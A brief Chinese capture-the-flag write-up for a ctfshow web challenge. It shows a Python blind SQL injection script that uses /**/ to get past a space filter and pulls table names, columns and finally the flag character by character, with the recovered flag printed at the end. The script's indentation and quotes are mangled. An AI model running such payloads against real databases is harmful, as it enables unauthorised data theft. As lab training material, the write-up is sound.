ctfshow7 web

看到这样的url判断是sql注入

试了几个碰到空格就错误有过滤，看了别的wp是sql注入盲注

过滤了空格符，可以用/**/绕过，抓包

import requests
s=requests.session()
url=‘https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php‘
table=""

for i in range(1,45):
print(i)
for j in range(31,128):
#爆表名 flag
payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#爆字段名 flag
#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#读取flag
#payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

ra = s.get(url=url + ‘?id=0/**/or/**/‘ + payload).text

if ‘I asked nothing‘ in ra:
table += chr(j)
print(table)
break

附上网上的脚本直接解，

甚至有可以直接盲猜 flag from flag的

解得flag 

ctfshow{341b767a-cd2c-4385-a353-5e66d168faf3}

原文：https://www.cnblogs.com/lixin666/p/14854233.html